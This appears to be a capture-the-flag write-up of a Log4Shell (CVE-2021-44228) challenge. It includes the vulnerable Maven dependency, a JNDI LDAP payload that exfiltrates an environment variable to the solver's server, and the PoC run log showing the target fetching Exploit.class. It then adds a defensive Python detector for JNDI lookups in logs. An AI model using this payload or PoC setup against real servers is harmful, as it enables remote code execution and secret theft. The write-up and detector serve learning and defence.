Tags: exploit log4j web env java
`pom.xml` in the Java Maven project says:
```xml
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
```
That's the vulnerable version of Log4j everyone was going crazy about.
There's this PoC exploit for Log4j: https://github.com/kozmer/log4j-shell-poc
I ran it on my VPS.
I submitted `${jndi:ldap://123.123.123.123:1389/${env:flag}}` as the text with an image that I corrupted by just typing in random letters in Burp Suite in the middle of the image bytes until I got the right kind of error in the Java code for it to log that text and execute the JNDI LDAP request.
The flag was an env variable.
```
~/ctf/log4j/log4j-shell-poc$ python3 poc.py --userip 123.123.123.123 --webport 8005 --lport 9001
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up LDAP server
[+] Send me: ${jndi:ldap://123.123.123.123:1389/a}
[+] Starting Webserver on port 8005 http://0.0.0.0:8005
Listening on 0.0.0.0:1389
Send LDAP reference result for a redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:39:30] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for 1753c{generate_text_to_get_an_epic_rce} redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:40:12] "GET /Exploit.class HTTP/1.1" 200 -
Send LDAP reference result for 1753c{generate_text_to_get_an_epic_rce} redirecting to http://123.123.123.123:8005/Exploit.class
68.183.72.188 - - [16/Mar/2024 08:40:12] "GET /Exploit.class HTTP/1.1" 200 -
```
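
From the defender's side, the payload above can be spotted in application logs or request bodies before it is ever resolved. The following is an added example, not part of the original writeup or the PoC repository: it parses nested `${...}` lookups, flags JNDI expressions, and reports which `env`/`sys` lookups would be leaked through the URL. The log lines, logger name and function names are constructed for illustration.

```python
import re

# Lookups that read process secrets; nested in a JNDI URL, their value leaves in the request.
SENSITIVE_PREFIXES = ("env", "sys")

def extract_lookups(text):
    """Return every ${...} expression in text, outermost first, honouring nesting."""
    found, stack, i = [], [], 0
    while i < len(text):
        if text.startswith("${", i):
            stack.append(i)
            i += 2
            continue
        if text[i] == "}" and stack:
            start = stack.pop()
            found.append((start, text[start:i + 1]))
        i += 1
    return [expr for _, expr in sorted(found)]

def classify(line):
    """Describe the first JNDI lookup in a log or request line, or return None."""
    for expr in extract_lookups(line):
        prefix, _, rest = expr[2:-1].partition(":")
        if prefix.lower() != "jndi":
            continue
        nested = [e[2:-1] for e in extract_lookups(rest)]
        leaks = [n for n in nested if n.partition(":")[0].lower() in SENSITIVE_PREFIXES]
        m = re.match(r"(\w+)://([^/:${}]+)(?::(\d+))?", rest)
        return {
            "expression": expr,
            "scheme": m.group(1) if m else None,
            "host": m.group(2) if m else None,
            "port": int(m.group(3)) if m and m.group(3) else None,
            "leaked_lookups": leaks,
        }
    return None

# Constructed sample lines; the logger name and message format are assumptions.
SAMPLE_LOG = [
    "ERROR ImageHandler - bad image, text=${jndi:ldap://123.123.123.123:1389/${env:flag}}",
    "ERROR ImageHandler - bad image, text=${jndi:ldap://123.123.123.123:1389/a}",
    "INFO  ImageHandler - stored image, text=hello world",
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry))
```

A non-empty `leaked_lookups` list means the named variables should be treated as disclosed and rotated, even if no class was ever loaded.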